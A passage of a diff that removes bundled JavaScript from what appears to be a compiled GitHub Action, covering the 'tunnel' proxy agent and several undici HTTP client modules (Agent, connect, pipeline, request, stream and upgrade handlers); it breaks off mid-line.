{ - var agent = new TunnelingAgent(options); - agent.request = https.request; - return agent; -} - -function httpsOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = https.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - - -function TunnelingAgent(options) { - var self = this; - self.options = options || {}; - self.proxyOptions = self.options.proxy || {}; - self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; - self.requests = []; - self.sockets = []; - - self.on('free', function onFree(socket, host, port, localAddress) { - var options = toOptions(host, port, localAddress); - for (var i = 0, len = self.requests.length; i < len; ++i) { - var pending = self.requests[i]; - if (pending.host === options.host && pending.port === options.port) { - // Detect the request to connect same origin server, - // reuse the connection. - self.requests.splice(i, 1); - pending.request.onSocket(socket); - return; - } - } - socket.destroy(); - self.removeSocket(socket); - }); -} -util.inherits(TunnelingAgent, events.EventEmitter); - -TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { - var self = this; - var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); - - if (self.sockets.length >= this.maxSockets) { - // We are over limit so we'll add it to the queue. - self.requests.push(options); - return; - } - - // If we are under maxSockets create a new one. - self.createSocket(options, function(socket) { - socket.on('free', onFree); - socket.on('close', onCloseOrRemove); - socket.on('agentRemove', onCloseOrRemove); - req.onSocket(socket); - - function onFree() { - self.emit('free', socket, options); - } - - function onCloseOrRemove(err) { - self.removeSocket(socket); - socket.removeListener('free', onFree); - socket.removeListener('close', onCloseOrRemove); - socket.removeListener('agentRemove', onCloseOrRemove); - } - }); -}; - -TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { - var self = this; - var placeholder = {}; - self.sockets.push(placeholder); - - var connectOptions = mergeOptions({}, self.proxyOptions, { - method: 'CONNECT', - path: options.host + ':' + options.port, - agent: false, - headers: { - host: options.host + ':' + options.port - } - }); - if (options.localAddress) { - connectOptions.localAddress = options.localAddress; - } - if (connectOptions.proxyAuth) { - connectOptions.headers = connectOptions.headers || {}; - connectOptions.headers['Proxy-Authorization'] = 'Basic ' + - new Buffer(connectOptions.proxyAuth).toString('base64'); - } - - debug('making CONNECT request'); - var connectReq = self.request(connectOptions); - connectReq.useChunkedEncodingByDefault = false; // for v0.6 - connectReq.once('response', onResponse); // for v0.6 - connectReq.once('upgrade', onUpgrade); // for v0.6 - connectReq.once('connect', onConnect); // for v0.7 or later - connectReq.once('error', onError); - connectReq.end(); - - function onResponse(res) { - // Very hacky. This is necessary to avoid http-parser leaks. - res.upgrade = true; - } - - function onUpgrade(res, socket, head) { - // Hacky. - process.nextTick(function() { - onConnect(res, socket, head); - }); - } - - function onConnect(res, socket, head) { - connectReq.removeAllListeners(); - socket.removeAllListeners(); - - if (res.statusCode !== 200) { - debug('tunneling socket could not be established, statusCode=%d', - res.statusCode); - socket.destroy(); - var error = new Error('tunneling socket could not be established, ' + - 'statusCode=' + res.statusCode); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - if (head.length > 0) { - debug('got illegal response body from proxy'); - socket.destroy(); - var error = new Error('got illegal response body from proxy'); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - debug('tunneling connection has established'); - self.sockets[self.sockets.indexOf(placeholder)] = socket; - return cb(socket); - } - - function onError(cause) { - connectReq.removeAllListeners(); - - debug('tunneling socket could not be established, cause=%s\n', - cause.message, cause.stack); - var error = new Error('tunneling socket could not be established, ' + - 'cause=' + cause.message); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - } -}; - -TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { - var pos = this.sockets.indexOf(socket) - if (pos === -1) { - return; - } - this.sockets.splice(pos, 1); - - var pending = this.requests.shift(); - if (pending) { - // If we have pending requests and a socket gets closed a new one - // needs to be created to take over in the pool for the one that closed. - this.createSocket(pending, function(socket) { - pending.request.onSocket(socket); - }); - } -}; - -function createSecureSocket(options, cb) { - var self = this; - TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { - var hostHeader = options.request.getHeader('host'); - var tlsOptions = mergeOptions({}, self.options, { - socket: socket, - servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host - }); - - // 0 is dummy port for v0.6 - var secureSocket = tls.connect(0, tlsOptions); - self.sockets[self.sockets.indexOf(socket)] = secureSocket; - cb(secureSocket); - }); -} - - -function toOptions(host, port, localAddress) { - if (typeof host === 'string') { // since v0.10 - return { - host: host, - port: port, - localAddress: localAddress - }; - } - return host; // for v0.11 or later -} - -function mergeOptions(target) { - for (var i = 1, len = arguments.length; i < len; ++i) { - var overrides = arguments[i]; - if (typeof overrides === 'object') { - var keys = Object.keys(overrides); - for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { - var k = keys[j]; - if (overrides[k] !== undefined) { - target[k] = overrides[k]; - } - } - } - } - return target; -} - - -var debug; -if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { - debug = function() { - var args = Array.prototype.slice.call(arguments); - if (typeof args[0] === 'string') { - args[0] = 'TUNNEL: ' + args[0]; - } else { - args.unshift('TUNNEL:'); - } - console.error.apply(console, args); - } -} else { - debug = function() {}; -} -exports.debug = debug; // for test - - -/***/ }), - -/***/ 1773: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Client = __nccwpck_require__(3598) -const Dispatcher = __nccwpck_require__(412) -const errors = __nccwpck_require__(8045) -const Pool = __nccwpck_require__(4634) -const BalancedPool = __nccwpck_require__(7931) -const Agent = __nccwpck_require__(7890) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError } = errors -const api = __nccwpck_require__(4059) -const buildConnector = __nccwpck_require__(2067) -const MockClient = __nccwpck_require__(8687) -const MockAgent = __nccwpck_require__(6771) -const MockPool = __nccwpck_require__(6193) -const mockErrors = __nccwpck_require__(888) -const ProxyAgent = __nccwpck_require__(7858) -const RetryHandler = __nccwpck_require__(2286) -const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) -const DecoratorHandler = __nccwpck_require__(6930) -const RedirectHandler = __nccwpck_require__(2860) -const createRedirectInterceptor = __nccwpck_require__(8861) - -let hasCrypto -try { - __nccwpck_require__(6113) - hasCrypto = true -} catch { - hasCrypto = false -} - -Object.assign(Dispatcher.prototype, api) - -module.exports.Dispatcher = Dispatcher -module.exports.Client = Client -module.exports.Pool = Pool -module.exports.BalancedPool = BalancedPool -module.exports.Agent = Agent -module.exports.ProxyAgent = ProxyAgent -module.exports.RetryHandler = RetryHandler - -module.exports.DecoratorHandler = DecoratorHandler -module.exports.RedirectHandler = RedirectHandler -module.exports.createRedirectInterceptor = createRedirectInterceptor - -module.exports.buildConnector = buildConnector -module.exports.errors = errors - -function makeDispatcher (fn) { - return (url, opts, handler) => { - if (typeof opts === 'function') { - handler = opts - opts = null - } - - if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { - throw new InvalidArgumentError('invalid url') - } - - if (opts != null && typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (opts && opts.path != null) { - if (typeof opts.path !== 'string') { - throw new InvalidArgumentError('invalid opts.path') - } - - let path = opts.path - if (!opts.path.startsWith('/')) { - path = `/${path}` - } - - url = new URL(util.parseOrigin(url).origin + path) - } else { - if (!opts) { - opts = typeof url === 'object' ? url : {} - } - - url = util.parseURL(url) - } - - const { agent, dispatcher = getGlobalDispatcher() } = opts - - if (agent) { - throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') - } - - return fn.call(dispatcher, { - ...opts, - origin: url.origin, - path: url.search ? `${url.pathname}${url.search}` : url.pathname, - method: opts.method || (opts.body ? 'PUT' : 'GET') - }, handler) - } -} - -module.exports.setGlobalDispatcher = setGlobalDispatcher -module.exports.getGlobalDispatcher = getGlobalDispatcher - -if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { - let fetchImpl = null - module.exports.fetch = async function fetch (resource) { - if (!fetchImpl) { - fetchImpl = (__nccwpck_require__(4881).fetch) - } - - try { - return await fetchImpl(...arguments) - } catch (err) { - if (typeof err === 'object') { - Error.captureStackTrace(err, this) - } - - throw err - } - } - module.exports.Headers = __nccwpck_require__(554).Headers - module.exports.Response = __nccwpck_require__(7823).Response - module.exports.Request = __nccwpck_require__(8359).Request - module.exports.FormData = __nccwpck_require__(2015).FormData - module.exports.File = __nccwpck_require__(8511).File - module.exports.FileReader = __nccwpck_require__(1446).FileReader - - const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) - - module.exports.setGlobalOrigin = setGlobalOrigin - module.exports.getGlobalOrigin = getGlobalOrigin - - const { CacheStorage } = __nccwpck_require__(7907) - const { kConstruct } = __nccwpck_require__(9174) - - // Cache & CacheStorage are tightly coupled with fetch. Even if it may run - // in an older version of Node, it doesn't have any use without fetch. - module.exports.caches = new CacheStorage(kConstruct) -} - -if (util.nodeMajor >= 16) { - const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) - - module.exports.deleteCookie = deleteCookie - module.exports.getCookies = getCookies - module.exports.getSetCookies = getSetCookies - module.exports.setCookie = setCookie - - const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - - module.exports.parseMIMEType = parseMIMEType - module.exports.serializeAMimeType = serializeAMimeType -} - -if (util.nodeMajor >= 18 && hasCrypto) { - const { WebSocket } = __nccwpck_require__(4284) - - module.exports.WebSocket = WebSocket -} - -module.exports.request = makeDispatcher(api.request) -module.exports.stream = makeDispatcher(api.stream) -module.exports.pipeline = makeDispatcher(api.pipeline) -module.exports.connect = makeDispatcher(api.connect) -module.exports.upgrade = makeDispatcher(api.upgrade) - -module.exports.MockClient = MockClient -module.exports.MockPool = MockPool -module.exports.MockAgent = MockAgent -module.exports.mockErrors = mockErrors - - -/***/ }), - -/***/ 7890: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) -const DispatcherBase = __nccwpck_require__(4839) -const Pool = __nccwpck_require__(4634) -const Client = __nccwpck_require__(3598) -const util = __nccwpck_require__(3983) -const createRedirectInterceptor = __nccwpck_require__(8861) -const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() - -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kMaxRedirections = Symbol('maxRedirections') -const kOnDrain = Symbol('onDrain') -const kFactory = Symbol('factory') -const kFinalizer = Symbol('finalizer') -const kOptions = Symbol('options') - -function defaultFactory (origin, opts) { - return opts && opts.connections === 1 - ? new Client(origin, opts) - : new Pool(origin, opts) -} - -class Agent extends DispatcherBase { - constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { - super() - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (connect && typeof connect !== 'function') { - connect = { ...connect } - } - - this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) - ? options.interceptors.Agent - : [createRedirectInterceptor({ maxRedirections })] - - this[kOptions] = { ...util.deepClone(options), connect } - this[kOptions].interceptors = options.interceptors - ? { ...options.interceptors } - : undefined - this[kMaxRedirections] = maxRedirections - this[kFactory] = factory - this[kClients] = new Map() - this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { - const ref = this[kClients].get(key) - if (ref !== undefined && ref.deref() === undefined) { - this[kClients].delete(key) - } - }) - - const agent = this - - this[kOnDrain] = (origin, targets) => { - agent.emit('drain', origin, [agent, ...targets]) - } - - this[kOnConnect] = (origin, targets) => { - agent.emit('connect', origin, [agent, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - agent.emit('disconnect', origin, [agent, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - agent.emit('connectionError', origin, [agent, ...targets], err) - } - } - - get [kRunning] () { - let ret = 0 - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore next: gc is undeterministic */ - if (client) { - ret += client[kRunning] - } - } - return ret - } - - [kDispatch] (opts, handler) { - let key - if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { - key = String(opts.origin) - } else { - throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') - } - - const ref = this[kClients].get(key) - - let dispatcher = ref ? ref.deref() : null - if (!dispatcher) { - dispatcher = this[kFactory](opts.origin, this[kOptions]) - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].set(key, new WeakRef(dispatcher)) - this[kFinalizer].register(dispatcher, key) - } - - return dispatcher.dispatch(opts, handler) - } - - async [kClose] () { - const closePromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - closePromises.push(client.close()) - } - } - - await Promise.all(closePromises) - } - - async [kDestroy] (err) { - const destroyPromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - destroyPromises.push(client.destroy(err)) - } - } - - await Promise.all(destroyPromises) - } -} - -module.exports = Agent - - -/***/ }), - -/***/ 7032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { addAbortListener } = __nccwpck_require__(3983) -const { RequestAbortedError } = __nccwpck_require__(8045) - -const kListener = Symbol('kListener') -const kSignal = Symbol('kSignal') - -function abort (self) { - if (self.abort) { - self.abort() - } else { - self.onError(new RequestAbortedError()) - } -} - -function addSignal (self, signal) { - self[kSignal] = null - self[kListener] = null - - if (!signal) { - return - } - - if (signal.aborted) { - abort(self) - return - } - - self[kSignal] = signal - self[kListener] = () => { - abort(self) - } - - addAbortListener(self[kSignal], self[kListener]) -} - -function removeSignal (self) { - if (!self[kSignal]) { - return - } - - if ('removeEventListener' in self[kSignal]) { - self[kSignal].removeEventListener('abort', self[kListener]) - } else { - self[kSignal].removeListener('abort', self[kListener]) - } - - self[kSignal] = null - self[kListener] = null -} - -module.exports = { - addSignal, - removeSignal -} - - -/***/ }), - -/***/ 9744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { AsyncResource } = __nccwpck_require__(852) -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class ConnectHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_CONNECT') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.callback = callback - this.abort = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders () { - throw new SocketError('bad connect', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - removeSignal(this) - - this.callback = null - - let headers = rawHeaders - // Indicates is an HTTP2Session - if (headers != null) { - headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - } - - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function connect (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - connect.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const connectHandler = new ConnectHandler(opts, callback) - this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = connect - - -/***/ }), - -/***/ 8752: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - Readable, - Duplex, - PassThrough -} = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -const kResume = Symbol('resume') - -class PipelineRequest extends Readable { - constructor () { - super({ autoDestroy: true }) - - this[kResume] = null - } - - _read () { - const { [kResume]: resume } = this - - if (resume) { - this[kResume] = null - resume() - } - } - - _destroy (err, callback) { - this._read() - - callback(err) - } -} - -class PipelineResponse extends Readable { - constructor (resume) { - super({ autoDestroy: true }) - this[kResume] = resume - } - - _read () { - this[kResume]() - } - - _destroy (err, callback) { - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - callback(err) - } -} - -class PipelineHandler extends AsyncResource { - constructor (opts, handler) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof handler !== 'function') { - throw new InvalidArgumentError('invalid handler') - } - - const { signal, method, opaque, onInfo, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_PIPELINE') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.handler = handler - this.abort = null - this.context = null - this.onInfo = onInfo || null - - this.req = new PipelineRequest().on('error', util.nop) - - this.ret = new Duplex({ - readableObjectMode: opts.objectMode, - autoDestroy: true, - read: () => { - const { body } = this - - if (body && body.resume) { - body.resume() - } - }, - write: (chunk, encoding, callback) => { - const { req } = this - - if (req.push(chunk, encoding) || req._readableState.destroyed) { - callback() - } else { - req[kResume] = callback - } - }, - destroy: (err, callback) => { - const { body, req, res, ret, abort } = this - - if (!err && !ret._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (abort && err) { - abort() - } - - util.destroy(body, err) - util.destroy(req, err) - util.destroy(res, err) - - removeSignal(this) - - callback(err) - } - }).on('prefinish', () => { - const { req } = this - - // Node < 15 does not call _final in same tick. - req.push(null) - }) - - this.res = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - const { ret, res } = this - - assert(!res, 'pipeline cannot be retried') - - if (ret.destroyed) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume) { - const { opaque, handler, context } = this - - if (statusCode < 200) { - if (this.onInfo) { - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.onInfo({ statusCode, headers }) - } - return - } - - this.res = new PipelineResponse(resume) - - let body - try { - this.handler = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - body = this.runInAsyncScope(handler, null, { - statusCode, - headers, - opaque, - body: this.res, - context - }) - } catch (err) { - this.res.on('error', util.nop) - throw err - } - - if (!body || typeof body.on !== 'function') { - throw new InvalidReturnValueError('expected Readable') - } - - body - .on('data', (chunk) => { - const { ret, body } = this - - if (!ret.push(chunk) && body.pause) { - body.pause() - } - }) - .on('error', (err) => { - const { ret } = this - - util.destroy(ret, err) - }) - .on('end', () => { - const { ret } = this - - ret.push(null) - }) - .on('close', () => { - const { ret } = this - - if (!ret._readableState.ended) { - util.destroy(ret, new RequestAbortedError()) - } - }) - - this.body = body - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - res.push(null) - } - - onError (err) { - const { ret } = this - this.handler = null - util.destroy(ret, err) - } -} - -function pipeline (opts, handler) { - try { - const pipelineHandler = new PipelineHandler(opts, handler) - this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) - return pipelineHandler.ret - } catch (err) { - return new PassThrough().destroy(err) - } -} - -module.exports = pipeline - - -/***/ }), - -/***/ 5448: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Readable = __nccwpck_require__(3858) -const { - InvalidArgumentError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class RequestHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { - throw new InvalidArgumentError('invalid highWaterMark') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_REQUEST') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.res = null - this.abort = null - this.body = body - this.trailers = {} - this.context = null - this.onInfo = onInfo || null - this.throwOnError = throwOnError - this.highWaterMark = highWaterMark - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - const body = new Readable({ resume, abort, contentType, highWaterMark }) - - this.callback = null - this.res = body - if (callback !== null) { - if (this.throwOnError && statusCode >= 400) { - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body, contentType, statusCode, statusMessage, headers } - ) - } else { - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - trailers: this.trailers, - opaque, - body, - context - }) - } - } - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - util.parseHeaders(trailers, this.trailers) - - res.push(null) - } - - onError (err) { - const { res, callback, body, opaque } = this - - removeSignal(this) - - if (callback) { - // TODO: Does this need queueMicrotask? - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (res) { - this.res = null - // Ensure all queued handlers are invoked before destroying res. - queueMicrotask(() => { - util.destroy(res, err) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function request (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - request.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new RequestHandler(opts, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = request -module.exports.RequestHandler = RequestHandler - - -/***/ }), - -/***/ 5395: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { finished, PassThrough } = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class StreamHandler extends AsyncResource { - constructor (opts, factory, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('invalid factory') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_STREAM') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.factory = factory - this.callback = callback - this.res = null - this.abort = null - this.context = null - this.trailers = null - this.body = body - this.onInfo = onInfo || null - this.throwOnError = throwOnError || false - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { factory, opaque, context, callback, responseHeaders } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - this.factory = null - - let res - - if (this.throwOnError && statusCode >= 400) { - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - res = new PassThrough() - - this.callback = null - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body: res, contentType, statusCode, statusMessage, headers } - ) - } else { - if (factory === null) { - return - } - - res = this.runInAsyncScope(factory, null, { - statusCode, - headers, - opaque, - context - }) - - if ( - !res || - typeof res.write !== 'function' || - typeof res.end !== 'function' || - typeof res.on !== 'function' - ) { - throw new InvalidReturnValueError('expected Writable') - } - - // TODO: Avoid finished. It registers an unnecessary amount of listeners. - finished(res, { readable: false }, (err) => { - const { callback, res, opaque, trailers, abort } = this - - this.res = null - if (err || !res.readable) { - util.destroy(res, err) - } - - this.callback = null - this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) - - if (err) { - abort() - } - }) - } - - res.on('drain', resume) - - this.res = res - - const needDrain = res.writableNeedDrain !== undefined - ? res.writableNeedDrain - : res._writableState && res._writableState.needDrain - - return needDrain !== true - } - - onData (chunk) { - const { res } = this - - return res ? res.write(chunk) : true - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - if (!res) { - return - } - - this.trailers = util.parseHeaders(trailers) - - res.end() - } - - onError (err) { - const { res, callback, opaque, body } = this - - removeSignal(this) - - this.factory = null - - if (res) { - this.res = null - util.destroy(res, err) - } else if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function stream (opts, factory, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - stream.call(this, opts, factory, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new StreamHandler(opts, factory, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = stream - - -/***/ }), - -/***/ 6923: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const { AsyncResource } = __nccwpck_require__(852) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -class UpgradeHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_UPGRADE') - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.abort = null - this.context = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = null - } - - onHeaders () { - throw new SocketError('bad upgrade', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - assert.strictEqual(statusCode, 101) - - removeSignal(this) - - this.callback = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : 